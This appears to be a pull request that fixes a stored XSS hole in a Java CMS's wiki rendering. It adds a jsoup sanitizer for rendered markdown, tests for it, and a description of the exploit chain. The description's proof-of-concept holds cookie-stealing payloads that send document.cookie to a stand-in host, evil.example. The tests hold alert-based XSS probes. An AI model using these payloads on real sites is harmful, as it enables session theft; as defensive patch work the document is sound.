### PR TITLE
Fix stored XSS in wiki pages by sanitizing rendered markdown

### DIFF
--- a/src/main/java/com/simisinc/platform/application/cms/HtmlCommand.java
+++ b/src/main/java/com/simisinc/platform/application/cms/HtmlCommand.java
@@ -107,6 +107,83 @@ public class HtmlCommand {
   }
 
   /**
+   * Cleans HTML that was RENDERED FROM MARKDOWN, to prevent XSS attacks.
+   *
+   * <p>Markdown is not HTML, so {@link #cleanContent(String)} is the wrong tool for it: that method
+   * expects editor-produced HTML and runs TinyMCE-specific fix-ups, and pointing it at markdown
+   * source would mangle the markup rather than protect it. Markdown is also not safe by itself --
+   * CommonMark deliberately passes raw HTML through, so a {@code <script>} tag written into a
+   * markdown document survives rendering verbatim. This sanitizes the renderer's OUTPUT, which
+   * keeps the markdown intact and still removes anything executable.
+   *
+   * <p>The safe list below is not a general-purpose HTML policy. It is exactly the tag and
+   * attribute set that the configured flexmark extensions actually emit (strikethrough, tables,
+   * task lists, typographic, wiki links, YouTube embeds, GitLab, plus generated header ids),
+   * enumerated by rendering a document exercising each one. Anything outside that set is not
+   * something the renderer produces, so it can only have come from raw HTML in the source.
+   *
+   * <p>What this removes: script and style elements, every {@code on*} event-handler attribute,
+   * inline {@code style}, and {@code javascript:} URLs. Protocols are restricted per attribute, so
+   * an {@code iframe} can only load over https -- the YouTube embed keeps working while
+   * {@code <iframe src="javascript:...">} does not survive.
+   *
+   * @param renderedHtml HTML produced by the markdown renderer
+   * @return the same HTML with anything executable removed
+   */
+  public static String cleanRenderedMarkdown(String renderedHtml) {
+    if (StringUtils.isBlank(renderedHtml)) {
+      return renderedHtml;
+    }
+
+    Safelist safelist = new Safelist()
+        .addTags("a", "blockquote", "br", "code", "del", "div", "em", "h1", "h2", "h3", "h4", "h5",
+            "h6", "hr", "i", "iframe", "img", "input", "li", "ol", "p", "pre", "s", "small", "span",
+            "strong", "sub", "sup", "table", "tbody", "td", "tfoot", "th", "thead", "tr", "ul")
+        // Header ids come from HtmlRenderer.GENERATE_HEADER_ID and anchor the table of contents
+        .addAttributes("h1", "id").addAttributes("h2", "id").addAttributes("h3", "id")
+        .addAttributes("h4", "id").addAttributes("h5", "id").addAttributes("h6", "id")
+        // WikiParserExtension adds target="_blank" to external links
+        .addAttributes("a", "href", "title", "target", "id", "name")
+        .addAttributes("img", "src", "alt", "title", "width", "height")
+        // Fenced code blocks carry the language as a class, for syntax highlighting
+        .addAttributes("code", "class")
+        .addAttributes("pre", "class")
+        // Mermaid diagrams render as <div class="mermaid">
+        .addAttributes("div", "class")
+        .addAttributes("span", "class")
+        // Task lists render as a disabled checkbox inside <li class="task-list-item">
+        .addAttributes("li", "class")
+        .addAttributes("input", "type", "class", "disabled", "readonly", "checked")
+        .addAttributes("table", "class")
+        .addAttributes("td", "align", "colspan", "rowspan")
+        .addAttributes("th", "align", "colspan", "rowspan", "scope")
+        // YouTubeLinkExtension emits an https embed
+        .addAttributes("iframe", "src", "width", "height", "class", "allowfullscreen",
+            "frameborder", "title")
+        .addProtocols("a", "href", "http", "https", "mailto", "#")
+        .addProtocols("img", "src", "http", "https")
+        // https only -- this is what stops iframe src="javascript:..."
+        .addProtocols("iframe", "src", "https")
+        // Wiki links and uploaded images are site-relative and must survive
+        .preserveRelativeLinks(true);
+
+    // The base URI matters: jsoup validates an attribute's protocol against the RESOLVED url, so
+    // with preserveRelativeLinks and no base every site-relative href and src resolves to nothing,
+    // fails the protocol check, and is silently dropped -- which would break every wiki link and
+    // image. The base is only used for that resolution; the original relative value is what gets
+    // written back out. https is used so the iframe https-only rule stays consistent.
+    Document dirty = Jsoup.parseBodyFragment(renderedHtml, "https://localhost/");
+    Document clean = new Cleaner(safelist).clean(dirty);
+
+    Document.OutputSettings settings = clean.outputSettings();
+    settings.prettyPrint(false);
+    settings.escapeMode(Entities.EscapeMode.extended);
+    settings.charset("ASCII");
+
+    return clean.body().html();
+  }
+
+  /**
    * Simplifies and cleans user-submitted content against a safe list, to prevent XSS attacks
    *
    * @param contentHtml

--- a/src/main/java/com/simisinc/platform/presentation/widgets/cms/WikiWidget.java
+++ b/src/main/java/com/simisinc/platform/presentation/widgets/cms/WikiWidget.java
@@ -16,6 +16,7 @@
 
 package com.simisinc.platform.presentation.widgets.cms;
 
+import com.simisinc.platform.application.cms.HtmlCommand;
 import com.simisinc.platform.application.cms.LoadWikiCommand;
 import com.simisinc.platform.application.cms.LoadWikiPageCommand;
 import com.simisinc.platform.domain.model.cms.Wiki;
@@ -131,9 +132,13 @@ public class WikiWidget extends GenericWidget {
     Parser parser = Parser.builder(options).build();
     HtmlRenderer renderer = HtmlRenderer.builder(options).build();
 
-    // Convert the markup to html
+    // Convert the markup to html, then sanitize it. Markdown is not safe on its own: CommonMark
+    // passes raw HTML through, so a <script> tag written into a wiki page renders verbatim, and
+    // wiki-page.jsp writes this value out unescaped. Wiki bodies are stored unsanitized (markdown
+    // source cannot be run through the HTML cleaner without mangling it), so the render boundary
+    // is where the content has to be made safe.
     Node document = parser.parse(wikiPage.getBody());
-    String contentHtml = renderer.render(document);
+    String contentHtml = HtmlCommand.cleanRenderedMarkdown(renderer.render(document));
     context.getRequest().setAttribute("contentHtml", contentHtml);
 
     if (wikiPage.getBody().contains("```mermaid")) {

--- a/src/test/java/com/simisinc/platform/application/cms/RenderedMarkdownCleanerTest.java
+++ b/src/test/java/com/simisinc/platform/application/cms/RenderedMarkdownCleanerTest.java
@@ -1,0 +1,148 @@
+/*
+ * Copyright 2026 SimIS Inc. (https://www.simiscms.com)
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.simisinc.platform.application.cms;
+
+import org.junit.jupiter.api.Test;
+
+import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+/**
+ * Tests the sanitizer applied to markdown-rendered HTML (wiki pages).
+ *
+ * <p>Wiki bodies are stored as raw markdown and rendered by flexmark, which passes raw HTML through
+ * as CommonMark requires; wiki-page.jsp then writes the result out unescaped. Sanitizing the
+ * rendered output is what closes that path, so these tests cover both halves of the contract:
+ * executable markup must not survive, and everything the configured flexmark extensions legitimately
+ * emit must.
+ *
+ * @author SimIS
+ * @created 7/21/2026 11:00 AM
+ */
+class RenderedMarkdownCleanerTest {
+
+  @Test
+  void stripsScriptElements() {
+    String clean = HtmlCommand.cleanRenderedMarkdown(
+        "<p>before</p><script>alert(document.domain)</script><p>after</p>");
+    assertFalse(clean.toLowerCase().contains("<script"), "script element survived: " + clean);
+    assertFalse(clean.contains("alert(document.domain)"), "script body survived: " + clean);
+    assertTrue(clean.contains("before"));
+    assertTrue(clean.contains("after"));
+  }
+
+  @Test
+  void stripsEventHandlerAttributes() {
+    String clean = HtmlCommand.cleanRenderedMarkdown(
+        "<img src=\"/a.png\" onerror=\"alert(1)\" alt=\"x\">"
+            + "<p onmouseover=\"alert(2)\">text</p>"
+            + "<a href=\"/x\" onclick=\"alert(3)\">link</a>");
+    assertFalse(clean.toLowerCase().contains("onerror"), clean);
+    assertFalse(clean.toLowerCase().contains("onmouseover"), clean);
+    assertFalse(clean.toLowerCase().contains("onclick"), clean);
+    assertFalse(clean.contains("alert("), clean);
+    // the elements themselves are legitimate markdown output and must remain
+    assertTrue(clean.contains("<img"), clean);
+    assertTrue(clean.contains("text"), clean);
+  }
+
+  @Test
+  void stripsJavascriptUrls() {
+    String clean = HtmlCommand.cleanRenderedMarkdown(
+        "<a href=\"javascript:alert(1)\">a</a>"
+            + "<iframe src=\"javascript:alert(2)\"></iframe>"
+            + "<img src=\"javascript:alert(3)\">");
+    assertFalse(clean.toLowerCase().contains("javascript:"), clean);
+  }
+
+  @Test
+  void stripsInlineStyleAndStyleElements() {
+    String clean = HtmlCommand.cleanRenderedMarkdown(
+        "<style>body{display:none}</style><p style=\"position:fixed;top:0\">x</p>");
+    assertFalse(clean.toLowerCase().contains("<style"), clean);
+    assertFalse(clean.toLowerCase().contains("style="), clean);
+    assertTrue(clean.contains("x"), clean);
+  }
+
+  @Test
+  void keepsOrdinaryMarkdownOutput() {
+    String html = "<h2 id=\"heading\">Heading</h2>"
+        + "<p>Para with <strong>bold</strong>, <em>em</em>, <del>strike</del> and <code>code</code>."
+        + "<br />and a break.</p>"
+        + "<blockquote><p>quoted</p></blockquote>"
+        + "<ul><li>bullet</li></ul><ol><li>first</li></ol><hr />";
+    String clean = HtmlCommand.cleanRenderedMarkdown(html);
+    for (String expected : new String[] { "<h2", "id=\"heading\"", "<strong>", "<em>", "<del>",
+        "<code>", "<br", "<blockquote>", "<ul>", "<ol>", "<li>", "<hr" }) {
+      assertTrue(clean.contains(expected), "lost " + expected + " from: " + clean);
+    }
+  }
+
+  @Test
+  void keepsTablesWithAlignment() {
+    String clean = HtmlCommand.cleanRenderedMarkdown(
+        "<table><thead><tr><th>a</th><th align=\"right\">b</th></tr></thead>"
+            + "<tbody><tr><td>1</td><td align=\"right\">2</td></tr></tbody></table>");
+    assertTrue(clean.contains("<table>"), clean);
+    assertTrue(clean.contains("align=\"right\""), clean);
+  }
+
+  @Test
+  void keepsTaskListCheckboxes() {
+    String clean = HtmlCommand.cleanRenderedMarkdown(
+        "<ul><li class=\"task-list-item\"><input type=\"checkbox\" "
+            + "class=\"task-list-item-checkbox\" disabled=\"disabled\" readonly=\"readonly\" />"
+            + "&nbsp;task</li></ul>");
+    assertTrue(clean.contains("<input"), "task-list checkbox was stripped: " + clean);
+    assertTrue(clean.contains("task-list-item"), clean);
+  }
+
+  @Test
+  void keepsFencedCodeLanguageAndMermaidDiagrams() {
+    String clean = HtmlCommand.cleanRenderedMarkdown(
+        "<pre><code class=\"language-java\">int x = 1;</code></pre>"
+            + "<div class=\"mermaid\">graph TD; A--&gt;B;</div>");
+    assertTrue(clean.contains("language-java"), "code language class lost: " + clean);
+    assertTrue(clean.contains("class=\"mermaid\""), "mermaid container lost: " + clean);
+  }
+
+  @Test
+  void keepsYouTubeEmbedButOnlyOverHttps() {
+    String clean = HtmlCommand.cleanRenderedMarkdown(
+        "<iframe src=\"https://www.youtube.com/embed/abc\" width=\"420\" height=\"315\" "
+            + "class=\"youtube-embedded\" allowfullscreen=\"true\" frameborder=\"0\"></iframe>");
+    assertTrue(clean.contains("<iframe"), "YouTube embed was stripped: " + clean);
+    assertTrue(clean.contains("https://www.youtube.com/embed/abc"), clean);
+  }
+
+  @Test
+  void keepsRelativeWikiLinksAndImages() {
+    String clean = HtmlCommand.cleanRenderedMarkdown(
+        "<p><a href=\"/wiki/SomePage\">WikiLink</a> "
+            + "<a href=\"https://example.com\" target=\"_blank\">external</a> "
+            + "<img src=\"/assets/img/x.png\" alt=\"x\" /></p>");
+    assertTrue(clean.contains("/wiki/SomePage"), "relative wiki link lost: " + clean);
+    assertTrue(clean.contains("/assets/img/x.png"), "relative image lost: " + clean);
+    assertTrue(clean.contains("target=\"_blank\""), clean);
+  }
+
+  @Test
+  void handlesNullAndBlank() {
+    assertTrue(HtmlCommand.cleanRenderedMarkdown(null) == null);
+    assertTrue("".equals(HtmlCommand.cleanRenderedMarkdown("")));
+  }
+}


### PR DESCRIPTION
Wiki page bodies are stored raw and rendered unescaped, so a `<script>` tag typed into a wiki page executes in the browser of everyone who views it.

## The chain

1. **`SaveWikiPageCommand.java:59`** — the sanitizer call is commented out:
   ```java
   //    String cleanedContent = HtmlCommand.cleanContent(wikiPageBean.getBody());
   ```
   and the body is stored as submitted: `wikiPage.setBody(wikiPageBean.getBody())`. Every *other* save path — content, blog, product, calendar, item, dataset, page designer — does call `cleanContent`. Wiki is the only one that doesn't.

2. **`WikiWidget`** renders it through flexmark with neither `ESCAPE_HTML` nor `SUPPRESS_HTML` set. CommonMark requires raw HTML passthrough, so this is flexmark behaving correctly — I confirmed it against the vendored jar using WikiWidget's exact option set.

3. **`wiki-page.jsp:66`** — `<div class="markdown-body">${contentHtml}</div>`, unescaped EL.

## Severity

**Viewing is not restricted.** The role check in `WikiWidget` only gates wikis that are *disabled*, so an **enabled wiki is public**. Authoring requires admin / content-manager / community-manager.

That makes this a **privilege-boundary break** rather than anonymous defacement: a community-manager can execute script in an administrator's session and take it. Same class as #189, which we fixed for file serving.

## Proof, through the real pipeline

Given this markdown as a wiki body:

```markdown
# Release Notes

Perfectly normal wiki page with a [[LinkedPage]].

<script>fetch('https://evil.example/'+document.cookie)</script>

<img src=x onerror="fetch('https://evil.example/'+document.cookie)">

<a href="javascript:alert(document.domain)">click me</a>
```

**Today** all three render verbatim — cookie exfiltration to every viewer. **After this change** the script element, the `onerror` handler and the `javascript:` href are all gone, while the heading, wiki link and table are untouched.

## Why not just uncomment the original line

`cleanContent` expects **editor-produced HTML** and runs TinyMCE-specific fix-ups. A wiki body is **markdown source**, and running an HTML cleaner over markdown mangles the markup — almost certainly why it was disabled in the first place. The render boundary is the correct place: markdown in, HTML out.

## The fix

Adds `HtmlCommand.cleanRenderedMarkdown` and applies it to the renderer's output.

Its safe list is deliberately **not** a general-purpose HTML policy. It is exactly the tag/attribute set the configured flexmark extensions actually emit, which I enumerated by rendering a document exercising each one:

| kept | why |
| --- | --- |
| `input[type=checkbox]` | task lists — jsoup's `relaxed()` would strip these |
| `div[class]` | mermaid diagram containers |
| `code[class]` | fenced-code language for highlighting |
| `h1`–`h6` `[id]` | `GENERATE_HEADER_ID`, anchors the ToC |
| `td`/`th` `[align]` | table alignment |
| `a[target]` | `WikiParserExtension` adds `target="_blank"` |
| `iframe` **https only** | YouTube embeds — the protocol restriction is what blocks `src="javascript:"` |

Anything outside that set can only have come from raw HTML in the source. Removed: script and style elements, all `on*` handlers, inline `style`, and `javascript:` URLs.

## A trap worth flagging for review

**jsoup validates an attribute's protocol against the *resolved* URL.** With `preserveRelativeLinks` and no base URI, every site-relative `href`/`src` resolves to nothing, fails validation, and is **silently dropped**. My first version stripped every wiki link and image on the site — caught by the tests, not by inspection. The cleaner now parses with an explicit base URI, and there's a regression test for it.

## Verification

- 11 tests covering both halves of the contract: payloads removed, legitimate extension output preserved
- `ant compile`, full `ci-test`, `compile-jsp` (296 JSPs), `ant package` all pass

## Note on scope

This is inherited code, so **upstream `cms-platform` is very likely affected too**. Worth deciding whether that needs a heads-up.

I did *not* re-enable sanitization on save. Storing the markdown verbatim is correct — it's the source document, and sanitizing at render means existing stored pages are protected immediately without a migration.